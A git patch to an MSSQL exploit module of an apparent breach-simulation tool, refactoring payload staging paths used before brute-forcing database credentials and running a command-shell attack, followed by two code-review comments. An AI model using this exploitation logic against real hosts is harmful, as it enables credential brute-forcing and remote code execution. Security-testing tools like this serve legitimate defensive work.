From b5523a9c54dc63f9b0e7af8f457cfbcffe0d9eeb Mon Sep 17 00:00:00 2001
From: itay
Date: Thu, 21 Feb 2019 16:50:02 +0200
Subject: [PATCH] fix expanding of env variables
---
 monkey/infection_monkey/exploit/mssqlexec.py | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)
diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index 128755de0..b34178dd6 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -17,13 +17,14 @@ class MSSQLExploiter(HostExploiter):
 _TARGET_OS_TYPE = ['windows']
 LOGIN_TIMEOUT = 15
 SQL_DEFAULT_TCP_PORT = '1433'
- DEFAULT_PAYLOAD_PATH = os.path.expandvars(r'%TEMP%\~PLD123.bat') if platform.system() else '/tmp/~PLD123.bat'
+ DEFAULT_PAYLOAD_PATH_WIN = os.path.expandvars(r'%TEMP%\~PLD123.bat')
+ DEFAULT_PAYLOAD_PATH_LINUX = '/tmp/~PLD123.bat'
 def __init__(self, host):
 super(MSSQLExploiter, self).__init__(host)
 self.attacks_list = [mssqlexec_utils.CmdShellAttack]
- def create_payload_file(self, payload_path=DEFAULT_PAYLOAD_PATH):
+ def create_payload_file(self, payload_path):
 """
 This function creates dynamically the payload file to be transported and ran on the exploited machine.
 :param payload_path: A path to the create the payload file in
@@ -45,10 +46,13 @@ class MSSQLExploiter(HostExploiter):
 """
 username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
- if not self.create_payload_file():
+ payload_path = MSSQLExploiter.DEFAULT_PAYLOAD_PATH_LINUX if 'linux' in self.host.os['type'] \
+ else MSSQLExploiter.DEFAULT_PAYLOAD_PATH_WIN
+
+ if not self.create_payload_file(payload_path):
 return False
 if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list,
- self.DEFAULT_PAYLOAD_PATH):
+ payload_path):
 LOG.debug("Bruteforce was a success on host: {0}".format(self.host.ip_addr))
 return True
 else:
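Review bot: `DEFAULT_PAYLOAD_PATH_WIN` is still expanded once, at class-definition time, by whichever interpreter imports the module, and on a POSIX interpreter `os.path.expandvars` does not expand `%TEMP%`, so the constant keeps that literal text there. The two constants deserve a comment saying which machine each path refers to, for example `# payload staging paths; the Windows value is expanded at import time on the local machine`. Dropping the default from `create_payload_file(self, payload_path)` also makes the argument mandatory, so the `:param payload_path:` line should say it is required, and any caller outside this diff that relied on the default needs updating. The class body and the method's docstring continue outside the hunk.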
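Review bot: The new `payload_path` selection indexes `self.host.os['type']` directly, so a host record without a `type` entry raises `KeyError` instead of reaching one of the method's own `return False` paths; `self.host.os.get('type', '')` in that expression would keep the failure mode consistent. The choice is keyed on the remote host's OS, while `_TARGET_OS_TYPE` is `['windows']` for this class and, judging by its docstring, create_payload_file writes the file before it is transported. A one-line comment above the assignment stating which machine the path is resolved for would remove that ambiguity. The enclosing method starts and ends outside the hunk.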